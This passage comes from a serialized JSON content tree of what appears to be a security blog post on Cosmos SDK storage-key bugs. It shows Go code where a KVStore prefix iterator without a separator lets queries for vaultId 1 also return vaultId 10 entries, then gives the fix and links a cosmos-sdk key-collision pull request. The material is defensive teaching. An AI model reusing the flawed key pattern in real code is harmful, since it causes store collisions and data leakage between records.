i",{"type":25,"tag":216,"props":92412,"children":92413},{"style":6953},[92414],{"type":31,"value":80388},{"type":25,"tag":216,"props":92416,"children":92417},{"style":6947},[92418],{"type":31,"value":82613},{"type":25,"tag":216,"props":92420,"children":92421},{"style":6964},[92422],{"type":31,"value":179},{"type":25,"tag":216,"props":92424,"children":92425},{"style":7047},[92426],{"type":31,"value":92427},"KVStorePrefixIterator",{"type":25,"tag":216,"props":92429,"children":92430},{"style":6964},[92431],{"type":31,"value":7420},{"type":25,"tag":216,"props":92433,"children":92434},{"class":6922,"line":7216},[92435,92440],{"type":25,"tag":216,"props":92436,"children":92437},{"style":6947},[92438],{"type":31,"value":92439},"        kvStore",{"type":25,"tag":216,"props":92441,"children":92442},{"style":6964},[92443],{"type":31,"value":7465},{"type":25,"tag":216,"props":92445,"children":92446},{"class":6922,"line":7244},[92447,92452,92456,92460,92464,92469,92473,92478,92482,92486],{"type":25,"tag":216,"props":92448,"children":92449},{"style":6947},[92450],{"type":31,"value":92451},"        fmt",{"type":25,"tag":216,"props":92453,"children":92454},{"style":6964},[92455],{"type":31,"value":179},{"type":25,"tag":216,"props":92457,"children":92458},{"style":7047},[92459],{"type":31,"value":89194},{"type":25,"tag":216,"props":92461,"children":92462},{"style":6964},[92463],{"type":31,"value":1850},{"type":25,"tag":216,"props":92465,"children":92466},{"style":8205},[92467],{"type":31,"value":92468},"\"%s%d\"",{"type":25,"tag":216,"props":92470,"children":92471},{"style":6964},[92472],{"type":31,"value":7026},{"type":25,"tag":216,"props":92474,"children":92475},{"style":6947},[92476],{"type":31,"value":92477},"PositionMapPrefix",{"type":25,"tag":216,"props":92479,"children":92480},{"style":6964},[92481],{"type":31,"value":7026},{"type":25,"tag":216,"props":92483,"children":92484},{"style":6947},[92485],{"type":31,"value":92262},{"type":25,"tag":216,"props":92487,"children":92488},{"style":6964},[92489],{"type":31,"value":7107},{"type":25,"tag":216,"props":92491,"children":92492},{"class":6922,"line":7257},[92493],{"type":25,"tag":216,"props":92494,"children":92495},{"style":6964},[92496],{"type":31,"value":27876},{"type":25,"tag":216,"props":92498,"children":92499},{"class":6922,"line":7275},[92500,92504,92509,92513,92517,92522,92526,92530,92534,92539],{"type":25,"tag":216,"props":92501,"children":92502},{"style":6973},[92503],{"type":31,"value":6976},{"type":25,"tag":216,"props":92505,"children":92506},{"style":6964},[92507],{"type":31,"value":92508}," ; ",{"type":25,"tag":216,"props":92510,"children":92511},{"style":6947},[92512],{"type":31,"value":2289},{"type":25,"tag":216,"props":92514,"children":92515},{"style":6964},[92516],{"type":31,"value":179},{"type":25,"tag":216,"props":92518,"children":92519},{"style":7047},[92520],{"type":31,"value":92521},"Valid",{"type":25,"tag":216,"props":92523,"children":92524},{"style":6964},[92525],{"type":31,"value":32407},{"type":25,"tag":216,"props":92527,"children":92528},{"style":6947},[92529],{"type":31,"value":2289},{"type":25,"tag":216,"props":92531,"children":92532},{"style":6964},[92533],{"type":31,"value":179},{"type":25,"tag":216,"props":92535,"children":92536},{"style":7047},[92537],{"type":31,"value":92538},"Next",{"type":25,"tag":216,"props":92540,"children":92541},{"style":6964},[92542],{"type":31,"value":19694},{"type":25,"tag":216,"props":92544,"children":92545},{"class":6922,"line":7296},[92546,92551,92555,92560,92564,92568,92572,92576,92580,92585,92589,92594],{"type":25,"tag":216,"props":92547,"children":92548},{"style":6947},[92549],{"type":31,"value":92550},"        k",{"type":25,"tag":216,"props":92552,"children":92553},{"style":6953},[92554],{"type":31,"value":80388},{"type":25,"tag":216,"props":92556,"children":92557},{"style":6947},[92558],{"type":31,"value":92559}," strings",{"type":25,"tag":216,"props":92561,"children":92562},{"style":6964},[92563],{"type":31,"value":179},{"type":25,"tag":216,"props":92565,"children":92566},{"style":7047},[92567],{"type":31,"value":74012},{"type":25,"tag":216,"props":92569,"children":92570},{"style":6964},[92571],{"type":31,"value":1850},{"type":25,"tag":216,"props":92573,"children":92574},{"style":6947},[92575],{"type":31,"value":2289},{"type":25,"tag":216,"props":92577,"children":92578},{"style":6964},[92579],{"type":31,"value":179},{"type":25,"tag":216,"props":92581,"children":92582},{"style":7047},[92583],{"type":31,"value":92584},"Key",{"type":25,"tag":216,"props":92586,"children":92587},{"style":6964},[92588],{"type":31,"value":22334},{"type":25,"tag":216,"props":92590,"children":92591},{"style":6947},[92592],{"type":31,"value":92593},"Seperator",{"type":25,"tag":216,"props":92595,"children":92596},{"style":6964},[92597],{"type":31,"value":7107},{"type":25,"tag":216,"props":92599,"children":92600},{"class":6922,"line":7305},[92601],{"type":25,"tag":216,"props":92602,"children":92603},{"emptyLinePlaceholder":16},[92604],{"type":31,"value":7642},{"type":25,"tag":216,"props":92606,"children":92607},{"class":6922,"line":7557},[92608,92613,92617,92621,92626,92630,92634,92638,92642,92647,92651,92656,92660,92664],{"type":25,"tag":216,"props":92609,"children":92610},{"style":6947},[92611],{"type":31,"value":92612},"        username",{"type":25,"tag":216,"props":92614,"children":92615},{"style":6953},[92616],{"type":31,"value":80388},{"type":25,"tag":216,"props":92618,"children":92619},{"style":7047},[92620],{"type":31,"value":89535},{"type":25,"tag":216,"props":92622,"children":92623},{"style":6964},[92624],{"type":31,"value":92625},"([]",{"type":25,"tag":216,"props":92627,"children":92628},{"style":7375},[92629],{"type":31,"value":88736},{"type":25,"tag":216,"props":92631,"children":92632},{"style":6964},[92633],{"type":31,"value":7026},{"type":25,"tag":216,"props":92635,"children":92636},{"style":6947},[92637],{"type":31,"value":89608},{"type":25,"tag":216,"props":92639,"children":92640},{"style":6964},[92641],{"type":31,"value":179},{"type":25,"tag":216,"props":92643,"children":92644},{"style":7047},[92645],{"type":31,"value":92646},"DecodedLen",{"type":25,"tag":216,"props":92648,"children":92649},{"style":6964},[92650],{"type":31,"value":1850},{"type":25,"tag":216,"props":92652,"children":92653},{"style":6947},[92654],{"type":31,"value":92655},"k",{"type":25,"tag":216,"props":92657,"children":92658},{"style":6964},[92659],{"type":31,"value":7701},{"type":25,"tag":216,"props":92661,"children":92662},{"style":6989},[92663],{"type":31,"value":1882},{"type":25,"tag":216,"props":92665,"children":92666},{"style":6964},[92667],{"type":31,"value":92668},"]))\n",{"type":25,"tag":216,"props":92670,"children":92671},{"class":6922,"line":7574},[92672,92676,92680,92684,92688,92693,92697,92702,92706,92710,92714,92718,92722,92726],{"type":25,"tag":216,"props":92673,"children":92674},{"style":6947},[92675],{"type":31,"value":31706},{"type":25,"tag":216,"props":92677,"children":92678},{"style":6964},[92679],{"type":31,"value":7026},{"type":25,"tag":216,"props":92681,"children":92682},{"style":6947},[92683],{"type":31,"value":52389},{"type":25,"tag":216,"props":92685,"children":92686},{"style":6953},[92687],{"type":31,"value":80388},{"type":25,"tag":216,"props":92689,"children":92690},{"style":6947},[92691],{"type":31,"value":92692}," hex",{"type":25,"tag":216,"props":92694,"children":92695},{"style":6964},[92696],{"type":31,"value":179},{"type":25,"tag":216,"props":92698,"children":92699},{"style":7047},[92700],{"type":31,"value":92701},"Decode",{"type":25,"tag":216,"props":92703,"children":92704},{"style":6964},[92705],{"type":31,"value":1850},{"type":25,"tag":216,"props":92707,"children":92708},{"style":6947},[92709],{"type":31,"value":89442},{"type":25,"tag":216,"props":92711,"children":92712},{"style":6964},[92713],{"type":31,"value":7026},{"type":25,"tag":216,"props":92715,"children":92716},{"style":6947},[92717],{"type":31,"value":92655},{"type":25,"tag":216,"props":92719,"children":92720},{"style":6964},[92721],{"type":31,"value":7701},{"type":25,"tag":216,"props":92723,"children":92724},{"style":6989},[92725],{"type":31,"value":1882},{"type":25,"tag":216,"props":92727,"children":92728},{"style":6964},[92729],{"type":31,"value":59409},{"type":25,"tag":216,"props":92731,"children":92732},{"class":6922,"line":7591},[92733,92737,92741,92745,92749],{"type":25,"tag":216,"props":92734,"children":92735},{"style":6973},[92736],{"type":31,"value":7222},{"type":25,"tag":216,"props":92738,"children":92739},{"style":6947},[92740],{"type":31,"value":52490},{"type":25,"tag":216,"props":92742,"children":92743},{"style":6953},[92744],{"type":31,"value":68355},{"type":25,"tag":216,"props":92746,"children":92747},{"style":6936},[92748],{"type":31,"value":85890},{"type":25,"tag":216,"props":92750,"children":92751},{"style":6964},[92752],{"type":31,"value":7241},{"type":25,"tag":216,"props":92754,"children":92755},{"class":6922,"line":7604},[92756,92760,92764,92768],{"type":25,"tag":216,"props":92757,"children":92758},{"style":6973},[92759],{"type":31,"value":83048},{"type":25,"tag":216,"props":92761,"children":92762},{"style":6936},[92763],{"type":31,"value":85890},{"type":25,"tag":216,"props":92765,"children":92766},{"style":6964},[92767],{"type":31,"value":7026},{"type":25,"tag":216,"props":92769,"children":92770},{"style":6947},[92771],{"type":31,"value":87611},{"type":25,"tag":216,"props":92773,"children":92774},{"class":6922,"line":7613},[92775],{"type":25,"tag":216,"props":92776,"children":92777},{"style":6964},[92778],{"type":31,"value":7302},{"type":25,"tag":216,"props":92780,"children":92781},{"class":6922,"line":7636},[92782],{"type":25,"tag":216,"props":92783,"children":92784},{"emptyLinePlaceholder":16},[92785],{"type":31,"value":7642},{"type":25,"tag":216,"props":92787,"children":92788},{"class":6922,"line":7645},[92789,92794,92798,92802,92806,92810,92814,92818,92822,92826,92830,92834,92838,92842],{"type":25,"tag":216,"props":92790,"children":92791},{"style":6947},[92792],{"type":31,"value":92793},"        positionName",{"type":25,"tag":216,"props":92795,"children":92796},{"style":6953},[92797],{"type":31,"value":80388},{"type":25,"tag":216,"props":92799,"children":92800},{"style":7047},[92801],{"type":31,"value":89535},{"type":25,"tag":216,"props":92803,"children":92804},{"style":6964},[92805],{"type":31,"value":92625},{"type":25,"tag":216,"props":92807,"children":92808},{"style":7375},[92809],{"type":31,"value":88736},{"type":25,"tag":216,"props":92811,"children":92812},{"style":6964},[92813],{"type":31,"value":7026},{"type":25,"tag":216,"props":92815,"children":92816},{"style":6947},[92817],{"type":31,"value":89608},{"type":25,"tag":216,"props":92819,"children":92820},{"style":6964},[92821],{"type":31,"value":179},{"type":25,"tag":216,"props":92823,"children":92824},{"style":7047},[92825],{"type":31,"value":92646},{"type":25,"tag":216,"props":92827,"children":92828},{"style":6964},[92829],{"type":31,"value":1850},{"type":25,"tag":216,"props":92831,"children":92832},{"style":6947},[92833],{"type":31,"value":92655},{"type":25,"tag":216,"props":92835,"children":92836},{"style":6964},[92837],{"type":31,"value":7701},{"type":25,"tag":216,"props":92839,"children":92840},{"style":6989},[92841],{"type":31,"value":184},{"type":25,"tag":216,"props":92843,"children":92844},{"style":6964},[92845],{"type":31,"value":92668},{"type":25,"tag":216,"props":92847,"children":92848},{"class":6922,"line":7654},[92849,92853,92857,92861,92865,92869,92873,92877,92881,92885,92889,92893,92897,92901],{"type":25,"tag":216,"props":92850,"children":92851},{"style":6947},[92852],{"type":31,"value":31706},{"type":25,"tag":216,"props":92854,"children":92855},{"style":6964},[92856],{"type":31,"value":7026},{"type":25,"tag":216,"props":92858,"children":92859},{"style":6947},[92860],{"type":31,"value":52389},{"type":25,"tag":216,"props":92862,"children":92863},{"style":6953},[92864],{"type":31,"value":80388},{"type":25,"tag":216,"props":92866,"children":92867},{"style":6947},[92868],{"type":31,"value":92692},{"type":25,"tag":216,"props":92870,"children":92871},{"style":6964},[92872],{"type":31,"value":179},{"type":25,"tag":216,"props":92874,"children":92875},{"style":7047},[92876],{"type":31,"value":92701},{"type":25,"tag":216,"props":92878,"children":92879},{"style":6964},[92880],{"type":31,"value":1850},{"type":25,"tag":216,"props":92882,"children":92883},{"style":6947},[92884],{"type":31,"value":89711},{"type":25,"tag":216,"props":92886,"children":92887},{"style":6964},[92888],{"type":31,"value":7026},{"type":25,"tag":216,"props":92890,"children":92891},{"style":6947},[92892],{"type":31,"value":92655},{"type":25,"tag":216,"props":92894,"children":92895},{"style":6964},[92896],{"type":31,"value":7701},{"type":25,"tag":216,"props":92898,"children":92899},{"style":6989},[92900],{"type":31,"value":184},{"type":25,"tag":216,"props":92902,"children":92903},{"style":6964},[92904],{"type":31,"value":59409},{"type":25,"tag":216,"props":92906,"children":92907},{"class":6922,"line":7722},[92908,92912,92916,92920,92924],{"type":25,"tag":216,"props":92909,"children":92910},{"style":6973},[92911],{"type":31,"value":7222},{"type":25,"tag":216,"props":92913,"children":92914},{"style":6947},[92915],{"type":31,"value":52490},{"type":25,"tag":216,"props":92917,"children":92918},{"style":6953},[92919],{"type":31,"value":68355},{"type":25,"tag":216,"props":92921,"children":92922},{"style":6936},[92923],{"type":31,"value":85890},{"type":25,"tag":216,"props":92925,"children":92926},{"style":6964},[92927],{"type":31,"value":7241},{"type":25,"tag":216,"props":92929,"children":92930},{"class":6922,"line":7730},[92931,92935,92939,92943],{"type":25,"tag":216,"props":92932,"children":92933},{"style":6973},[92934],{"type":31,"value":83048},{"type":25,"tag":216,"props":92936,"children":92937},{"style":6936},[92938],{"type":31,"value":85890},{"type":25,"tag":216,"props":92940,"children":92941},{"style":6964},[92942],{"type":31,"value":7026},{"type":25,"tag":216,"props":92944,"children":92945},{"style":6947},[92946],{"type":31,"value":87611},{"type":25,"tag":216,"props":92948,"children":92949},{"class":6922,"line":7760},[92950],{"type":25,"tag":216,"props":92951,"children":92952},{"style":6964},[92953],{"type":31,"value":7302},{"type":25,"tag":216,"props":92955,"children":92956},{"class":6922,"line":7768},[92957],{"type":25,"tag":216,"props":92958,"children":92959},{"emptyLinePlaceholder":16},[92960],{"type":31,"value":7642},{"type":25,"tag":216,"props":92962,"children":92963},{"class":6922,"line":7800},[92964,92968,92972,92976,92980,92984,92989,92993,92997,93002,93006,93010],{"type":25,"tag":216,"props":92965,"children":92966},{"style":6973},[92967],{"type":31,"value":7222},{"type":25,"tag":216,"props":92969,"children":92970},{"style":6947},[92971],{"type":31,"value":66610},{"type":25,"tag":216,"props":92973,"children":92974},{"style":6964},[92975],{"type":31,"value":7026},{"type":25,"tag":216,"props":92977,"children":92978},{"style":6947},[92979],{"type":31,"value":82739},{"type":25,"tag":216,"props":92981,"children":92982},{"style":6953},[92983],{"type":31,"value":80388},{"type":25,"tag":216,"props":92985,"children":92986},{"style":6947},[92987],{"type":31,"value":92988}," values",{"type":25,"tag":216,"props":92990,"children":92991},{"style":6964},[92992],{"type":31,"value":7701},{"type":25,"tag":216,"props":92994,"children":92995},{"style":6947},[92996],{"type":31,"value":89442},{"type":25,"tag":216,"props":92998,"children":92999},{"style":6964},[93000],{"type":31,"value":93001},"]; ",{"type":25,"tag":216,"props":93003,"children":93004},{"style":6953},[93005],{"type":31,"value":24581},{"type":25,"tag":216,"props":93007,"children":93008},{"style":6947},[93009],{"type":31,"value":82739},{"type":25,"tag":216,"props":93011,"children":93012},{"style":6964},[93013],{"type":31,"value":7241},{"type":25,"tag":216,"props":93015,"children":93016},{"class":6922,"line":7808},[93017,93022,93026,93030,93034,93038,93042,93046,93050,93054,93058],{"type":25,"tag":216,"props":93018,"children":93019},{"style":6947},[93020],{"type":31,"value":93021},"            values",{"type":25,"tag":216,"props":93023,"children":93024},{"style":6964},[93025],{"type":31,"value":7701},{"type":25,"tag":216,"props":93027,"children":93028},{"style":6947},[93029],{"type":31,"value":89442},{"type":25,"tag":216,"props":93031,"children":93032},{"style":6964},[93033],{"type":31,"value":12614},{"type":25,"tag":216,"props":93035,"children":93036},{"style":6953},[93037],{"type":31,"value":266},{"type":25,"tag":216,"props":93039,"children":93040},{"style":7047},[93041],{"type":31,"value":89535},{"type":25,"tag":216,"props":93043,"children":93044},{"style":6964},[93045],{"type":31,"value":1850},{"type":25,"tag":216,"props":93047,"children":93048},{"style":6936},[93049],{"type":31,"value":71071},{"type":25,"tag":216,"props":93051,"children":93052},{"style":6964},[93053],{"type":31,"value":7701},{"type":25,"tag":216,"props":93055,"children":93056},{"style":7375},[93057],{"type":31,"value":89140},{"type":25,"tag":216,"props":93059,"children":93060},{"style":6964},[93061],{"type":31,"value":59409},{"type":25,"tag":216,"props":93063,"children":93064},{"class":6922,"line":7868},[93065],{"type":25,"tag":216,"props":93066,"children":93067},{"style":6964},[93068],{"type":31,"value":7302},{"type":25,"tag":216,"props":93070,"children":93071},{"class":6922,"line":13001},[93072],{"type":25,"tag":216,"props":93073,"children":93074},{"emptyLinePlaceholder":16},[93075],{"type":31,"value":7642},{"type":25,"tag":216,"props":93077,"children":93078},{"class":6922,"line":13019},[93079,93084,93088,93092,93096,93100,93104,93108,93112],{"type":25,"tag":216,"props":93080,"children":93081},{"style":6947},[93082],{"type":31,"value":93083},"        values",{"type":25,"tag":216,"props":93085,"children":93086},{"style":6964},[93087],{"type":31,"value":7701},{"type":25,"tag":216,"props":93089,"children":93090},{"style":6947},[93091],{"type":31,"value":89442},{"type":25,"tag":216,"props":93093,"children":93094},{"style":6964},[93095],{"type":31,"value":52927},{"type":25,"tag":216,"props":93097,"children":93098},{"style":6947},[93099],{"type":31,"value":89711},{"type":25,"tag":216,"props":93101,"children":93102},{"style":6964},[93103],{"type":31,"value":12614},{"type":25,"tag":216,"props":93105,"children":93106},{"style":6953},[93107],{"type":31,"value":266},{"type":25,"tag":216,"props":93109,"children":93110},{"style":6947},[93111],{"type":31,"value":11376},{"type":25,"tag":216,"props":93113,"children":93114},{"style":6964},[93115],{"type":31,"value":7241},{"type":25,"tag":216,"props":93117,"children":93118},{"class":6922,"line":13064},[93119,93123,93127,93132,93136,93141],{"type":25,"tag":216,"props":93120,"children":93121},{"style":6947},[93122],{"type":31,"value":30909},{"type":25,"tag":216,"props":93124,"children":93125},{"style":6964},[93126],{"type":31,"value":19288},{"type":25,"tag":216,"props":93128,"children":93129},{"style":6947},[93130],{"type":31,"value":93131},"iterator",{"type":25,"tag":216,"props":93133,"children":93134},{"style":6964},[93135],{"type":31,"value":179},{"type":25,"tag":216,"props":93137,"children":93138},{"style":7047},[93139],{"type":31,"value":93140},"Value",{"type":25,"tag":216,"props":93142,"children":93143},{"style":6964},[93144],{"type":31,"value":7448},{"type":25,"tag":216,"props":93146,"children":93147},{"class":6922,"line":13170},[93148],{"type":25,"tag":216,"props":93149,"children":93150},{"style":6964},[93151],{"type":31,"value":7302},{"type":25,"tag":216,"props":93153,"children":93154},{"class":6922,"line":27455},[93155],{"type":25,"tag":216,"props":93156,"children":93157},{"style":6964},[93158],{"type":31,"value":7311},{"type":25,"tag":216,"props":93160,"children":93161},{"class":6922,"line":27490},[93162,93166],{"type":25,"tag":216,"props":93163,"children":93164},{"style":6973},[93165],{"type":31,"value":20947},{"type":25,"tag":216,"props":93167,"children":93168},{"style":6947},[93169],{"type":31,"value":93170}," values\n",{"type":25,"tag":216,"props":93172,"children":93173},{"class":6922,"line":27498},[93174],{"type":25,"tag":216,"props":93175,"children":93176},{"style":6964},[93177],{"type":31,"value":7874},{"type":25,"tag":38,"props":93179,"children":93180},{},[93181,93183,93189,93190,93196,93198,93203,93205,93210,93212,93217,93219,93225,93227,93233],{"type":31,"value":93182},"By now, you may have already noticed that this implementation suffers from field malleability issues. Imagine a scenario where both ",{"type":25,"tag":82,"props":93184,"children":93186},{"className":93185},[],[93187],{"type":31,"value":93188},"vaultId = 1",{"type":31,"value":1307},{"type":25,"tag":82,"props":93191,"children":93193},{"className":93192},[],[93194],{"type":31,"value":93195},"vaultId = 10",{"type":31,"value":93197}," coexist. If we try to fetch data under ",{"type":25,"tag":82,"props":93199,"children":93201},{"className":93200},[],[93202],{"type":31,"value":93188},{"type":31,"value":93204},", all entries under ",{"type":25,"tag":82,"props":93206,"children":93208},{"className":93207},[],[93209],{"type":31,"value":93195},{"type":31,"value":93211}," will also be returned simply because ",{"type":25,"tag":82,"props":93213,"children":93215},{"className":93214},[],[93216],{"type":31,"value":184},{"type":31,"value":93218}," is a prefix of ",{"type":25,"tag":82,"props":93220,"children":93222},{"className":93221},[],[93223],{"type":31,"value":93224},"10",{"type":31,"value":93226},". To fix this, we must once again append the ",{"type":25,"tag":82,"props":93228,"children":93230},{"className":93229},[],[93231],{"type":31,"value":93232},"Separator",{"type":31,"value":93234}," to the iterator prefix.",{"type":25,"tag":206,"props":93236,"children":93238},{"code":93237,"language":80136,"meta":7,"className":80137,"style":7},"i := sdk.KVStorePrefixIterator(\n    kvStore,\n    fmt.Sprintf(\"%s%d%s\", PositionMapPrefix, vaultId, Seperator),\n)\n",[93239],{"type":25,"tag":82,"props":93240,"children":93241},{"__ignoreMap":7},[93242,93269,93281,93334],{"type":25,"tag":216,"props":93243,"children":93244},{"class":6922,"line":6923},[93245,93249,93253,93257,93261,93265],{"type":25,"tag":216,"props":93246,"children":93247},{"style":6947},[93248],{"type":31,"value":2289},{"type":25,"tag":216,"props":93250,"children":93251},{"style":6953},[93252],{"type":31,"value":80388},{"type":25,"tag":216,"props":93254,"children":93255},{"style":6947},[93256],{"type":31,"value":82613},{"type":25,"tag":216,"props":93258,"children":93259},{"style":6964},[93260],{"type":31,"value":179},{"type":25,"tag":216,"props":93262,"children":93263},{"style":7047},[93264],{"type":31,"value":92427},{"type":25,"tag":216,"props":93266,"children":93267},{"style":6964},[93268],{"type":31,"value":7420},{"type":25,"tag":216,"props":93270,"children":93271},{"class":6922,"line":6769},[93272,93277],{"type":25,"tag":216,"props":93273,"children":93274},{"style":6947},[93275],{"type":31,"value":93276},"    kvStore",{"type":25,"tag":216,"props":93278,"children":93279},{"style":6964},[93280],{"type":31,"value":7465},{"type":25,"tag":216,"props":93282,"children":93283},{"class":6922,"line":6778},[93284,93289,93293,93297,93301,93306,93310,93314,93318,93322,93326,93330],{"type":25,"tag":216,"props":93285,"children":93286},{"style":6947},[93287],{"type":31,"value":93288},"    fmt",{"type":25,"tag":216,"props":93290,"children":93291},{"style":6964},[93292],{"type":31,"value":179},{"type":25,"tag":216,"props":93294,"children":93295},{"style":7047},[93296],{"type":31,"value":89194},{"type":25,"tag":216,"props":93298,"children":93299},{"style":6964},[93300],{"type":31,"value":1850},{"type":25,"tag":216,"props":93302,"children":93303},{"style":8205},[93304],{"type":31,"value":93305},"\"%s%d%s\"",{"type":25,"tag":216,"props":93307,"children":93308},{"style":6964},[93309],{"type":31,"value":7026},{"type":25,"tag":216,"props":93311,"children":93312},{"style":6947},[93313],{"type":31,"value":92477},{"type":25,"tag":216,"props":93315,"children":93316},{"style":6964},[93317],{"type":31,"value":7026},{"type":25,"tag":216,"props":93319,"children":93320},{"style":6947},[93321],{"type":31,"value":92262},{"type":25,"tag":216,"props":93323,"children":93324},{"style":6964},[93325],{"type":31,"value":7026},{"type":25,"tag":216,"props":93327,"children":93328},{"style":6947},[93329],{"type":31,"value":92593},{"type":25,"tag":216,"props":93331,"children":93332},{"style":6964},[93333],{"type":31,"value":10688},{"type":25,"tag":216,"props":93335,"children":93336},{"class":6922,"line":7005},[93337],{"type":25,"tag":216,"props":93338,"children":93339},{"style":6964},[93340],{"type":31,"value":7107},{"type":25,"tag":38,"props":93342,"children":93343},{},[93344,93346,93351],{"type":31,"value":93345},"At first, identifying these serialization issues may seem easy. Once data structures and ",{"type":25,"tag":82,"props":93347,"children":93349},{"className":93348},[],[93350],{"type":31,"value":88948},{"type":31,"value":93352}," usage grow increasingly more complex, developers can unintentionally overlook storage key parsing mistakes.",{"type":25,"tag":38,"props":93354,"children":93355},{},[93356],{"type":31,"value":93357},"Storage keys continue to be a tedious and persistent issue when building on Cosmos. It is crucial to approach development with awareness and care to prevent bugs from creeping into code.",{"type":25,"tag":606,"props":93359,"children":93361},{"id":93360},"real-world-examples-5",[93362],{"type":31,"value":80661},{"type":25,"tag":38,"props":93364,"children":93365},{},[93366,93367,93372,93374,93381,93383,93389],{"type":31,"value":474},{"type":25,"tag":82,"props":93368,"children":93370},{"className":93369},[],[93371],{"type":31,"value":82434},{"type":31,"value":93373}," previously lacked protection against KVStore ",{"type":25,"tag":162,"props":93375,"children":93378},{"href":93376,"rel":93377},"https://github.com/cosmos/cosmos-sdk/pull/9363",[166],[93379],{"type":31,"value":93380},"key collisions",{"type":31,"value":93382},". This prior oversight allowed developers to unintentionally create two ",{"type":25,"tag":82,"props":93384,"children":93386},{"className":93385},[],[93387],{"type":31,"value":93388},"KVStores",{"type":31,"value":93390}," that were not independent of each other.",{"type":25,"tag":38,"props":93392,"children":93393},{},[93394],{"type":25,"tag":162,"props":93395,"children":93398},{"href":93396,"rel":93397},"https://github.com/cosmos/cosmos-sdk/blob/25bd118e4cc1d60ab2f9d2e0302d271416551aa9/types/store.go#L108",[166],[93399],{"type":31,"value":80711},{"type":25,"tag":206,"props":93401,"children":93403},{"code":93402,"language":80136,"meta":7,"className":80137,"style":7},"func NewKVStoreKeys(names ...string) map[string]*KVStoreKey {\n    keys := make(map[string]*KVStoreKey)\n    for _, name := range names {\n        keys[name] = NewKVStoreKey(name)\n    }\n\n    return keys\n}\n",[93404],{"type":25,"tag":82,"props":93405,"children":93406},{"__ignoreMap":7},[93407,93469,93517,93553,93593,93600,93607,93619],{"type":25,"tag":216,"props":93408,"children":93409},{"class":6922,"line":6923},[93410,93414,93419,93423,93428,93432,93436,93440,93444,93448,93452,93456,93460,93465],{"type":25,"tag":216,"props":93411,"children":93412},{"style":6936},[93413],{"type":31,"value":80272},{"type":25,"tag":216,"props":93415,"children":93416},{"style":7047},[93417],{"type":31,"value":93418}," NewKVStoreKeys",{"type":25,"tag":216,"props":93420,"children":93421},{"style":6964},[93422],{"type":31,"value":1850},{"type":25,"tag":216,"props":93424,"children":93425},{"style":6947},[93426],{"type":31,"value":93427},"names",{"type":25,"tag":216,"props":93429,"children":93430},{"style":6953},[93431],{"type":31,"value":29257},{"type":25,"tag":216,"props":93433,"children":93434},{"style":7375},[93435],{"type":31,"value":33627},{"type":25,"tag":216,"props":93437,"children":93438},{"style":6964},[93439],{"type":31,"value":7036},{"type":25,"tag":216,"props":93441,"children":93442},{"style":6936},[93443],{"type":31,"value":71071},{"type":25,"tag":216,"props":93445,"children":93446},{"style":6964},[93447],{"type":31,"value":7701},{"type":25,"tag":216,"props":93449,"children":93450},{"style":7375},[93451],{"type":31,"value":33627},{"type":25,"tag":216,"props":93453,"children":93454},{"style":6964},[93455],{"type":31,"value":19368},{"type":25,"tag":216,"props":93457,"children":93458},{"style":6953},[93459],{"type":31,"value":8519},{"type":25,"tag":216,"props":93461,"children":93462},{"style":7375},[93463],{"type":31,"value":93464},"KVStoreKey",{"type":25,"tag":216,"props":93466,"children":93467},{"style":6964},[93468],{"type":31,"value":7241},{"type":25,"tag":216,"props":93470,"children":93471},{"class":6922,"line":6769},[93472,93477,93481,93485,93489,93493,93497,93501,93505,93509,93513],{"type":25,"tag":216,"props":93473,"children":93474},{"style":6947},[93475],{"type":31,"value":93476},"    keys",{"type":25,"tag":216,"props":93478,"children":93479},{"style":6953},[93480],{"type":31,"value":80388},{"type":25,"tag":216,"props":93482,"children":93483},{"style":7047},[93484],{"type":31,"value":89535},{"type":25,"tag":216,"props":93486,"children":93487},{"style":6964},[93488],{"type":31,"value":1850},{"type":25,"tag":216,"props":93490,"children":93491},{"style":6936},[93492],{"type":31,"value":71071},{"type":25,"tag":216,"props":93494,"children":93495},{"style":6964},[93496],{"type":31,"value":7701},{"type":25,"tag":216,"props":93498,"children":93499},{"style":7375},[93500],{"type":31,"value":33627},{"type":25,"tag":216,"props":93502,"children":93503},{"style":6964},[93504],{"type":31,"value":19368},{"type":25,"tag":216,"props":93506,"children":93507},{"style":6953},[93508],{"type":31,"value":8519},{"type":25,"tag":216,"props":93510,"children":93511},{"style":7375},[93512],{"type":31,"value":93464},{"type":25,"tag":216,"props":93514,"children":93515},{"style":6964},[93516],{"type":31,"value":7107},{"type":25,"tag":216,"props":93518,"children":93519},{"class":6922,"line":6778},[93520,93524,93528,93532,93536,93540,93544,93549],{"type":25,"tag":216,"props":93521,"children":93522},{"style":6973},[93523],{"type":31,"value":6976},{"type":25,"tag":216,"props":93525,"children":93526},{"style":6947},[93527],{"type":31,"value":6981},{"type":25,"tag":216,"props":93529,"children":93530},{"style":6964},[93531],{"type":31,"value":7026},{"type":25,"tag":216,"props":93533,"children":93534},{"style":6947},[93535],{"type":31,"value":52467},{"type":25,"tag":216,"props":93537,"children":93538},{"style":6953},[93539],{"type":31,"value":80388},{"type":25,"tag":216,"props":93541,"children":93542},{"style":6973},[93543],{"type":31,"value":81371},{"type":25,"tag":216,"props":93545,"children":93546},{"style":6947},[93547],{"type":31,"value":93548}," names",{"type":25,"tag":216,"props":93550,"children":93551},{"style":6964},[93552],{"type":31,"value":7241},{"type":25,"tag":216,"props":93554,"children":93555},{"class":6922,"line":7005},[93556,93560,93564,93568,93572,93576,93581,93585,93589],{"type":25,"tag":216,"props":93557,"children":93558},{"style":6947},[93559],{"type":31,"value":29289},{"type":25,"tag":216,"props":93561,"children":93562},{"style":6964},[93563],{"type":31,"value":7701},{"type":25,"tag":216,"props":93565,"children":93566},{"style":6947},[93567],{"type":31,"value":52467},{"type":25,"tag":216,"props":93569,"children":93570},{"style":6964},[93571],{"type":31,"value":12614},{"type":25,"tag":216,"props":93573,"children":93574},{"style":6953},[93575],{"type":31,"value":266},{"type":25,"tag":216,"props":93577,"children":93578},{"style":7047},[93579],{"type":31,"value":93580}," 